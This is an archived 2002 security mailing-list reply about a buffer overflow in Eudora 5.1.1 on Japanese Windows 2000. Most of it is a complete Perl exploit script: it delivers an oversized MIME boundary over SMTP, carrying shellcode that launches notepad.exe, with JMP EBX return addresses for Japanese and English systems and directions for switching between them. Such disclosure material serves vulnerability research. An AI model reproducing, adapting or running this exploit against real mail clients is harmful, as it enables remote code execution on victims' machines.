OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Kanatoko (anvil_at_jumperz.net)
Date: Sat Aug 10 2002 - 13:25:36 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi Steven.

    > Likewise, when is the exploit triggered on Japanese Windows 2000 Pro?

    Exploit triggered when the message is received and listed in the
    "IN MailBox".

    Please try this code.
    It is a exploit code for Eudora 5.1.1 on Japanese win2k pro SP2.

    If you use English win2k, pls modify the line 44

    $buf .= $jmp_ebx_jp;

    to

    $buf .= $jmp_ebx_en;

    and test it.

    Sorry for my poor English.

    #!/usr/local/bin/perl

    #--------------------------------------------------
    # Eudora Version 5.1.1 Sponsored Mode exploit
    # for Japanese Windows 2000 Pro (SP2)
    # written by Kanatoko <anviljumperz.net>
    # http://www.jumperz.net/
    #--------------------------------------------------

    use Socket;

      #0x77e3ac97 JMP EBX ( Japanese SP2 )
    $jmp_ebx_jp = "\x97\xAC\xE3\x77";

      #0x77e2492b JMP EBX ( English SP2 )
    $jmp_ebx_en = "\x2B\x49\xE2\x77";

    $connect_host = 'mail.jumperz.net';
    $port = 25;
    $env_from = 'anviljumperz.net';
    $env_to = 'targetjumperz.net';
    $from = 'anviljumperz.net';
    $to = 'targetjumperz.net';

    $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
    $sock_addr = pack_sockaddr_in($port,$iaddr);
    socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
    connect(SOCKET,$sock_addr) || die "Connect Error\n";
    select(SOCKET); $|=1; select(STDOUT);

            #egg written by UNYUN (http://www.shadowpenguin.org/)
            #57bytes
    $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
    $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
    $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
    $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
    $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
    $egg .= "notepad.exe";

    $buf = "\x90" x 117;
    $buf .= $egg;
    $buf .= "\xEB\xA0"; #JMP -0x60
    $buf .= "A" x 2;
    $buf .= $jmp_ebx_jp;

    $hoge = <SOCKET>;
    print SOCKET "HELO hoge\x0D\x0A";
    $hoge = <SOCKET>;
    print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
    $hoge = <SOCKET>;
    print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
    $hoge = <SOCKET>;
    print SOCKET "DATA\x0D\x0A";
    $hoge = <SOCKET>;

    print SOCKET << "_EOD_";
    MIME-Version: 1.0\x0D
    >From: $from\x0D
    To: $to\x0D
    Content-Type: multipart/mixed; boundary="$buf"\x0D
    \x0D
    .\x0D
    _EOD_
    $hoge = <SOCKET>;print $hoge;
    print SOCKET "QUIT\x0D\x0A";
    $hoge = <SOCKET>; 

    --
Kanatoko <anviljumperz.net>
JUMPER : http://www.jumperz.net/

    On Fri, 9 Aug 2002 21:19:17 -0500 (CDT)
Steven Michaud <smchmidway.uchicago.edu> wrote:

    > It's not too surprising that this exploit doesn't work on English
> Windows 2000 Pro, with or without SP2.  But I can't even get it to
> crash Eudora (5.1 or 5.1.1) unless I open the hacked message,
> right-click on it, and feed it through the "Unwrap Text" plugin.
> 
> Has anyone ported this exploit to English Windows 2000?  If so, when
> is the exploit triggered?  (In the preview pane?  When you open the
> message?  Under some other circumstances?)
> 
> Likewise, when is the exploit triggered on Japanese Windows 2000 Pro?
> 
> Thanks in advance!
>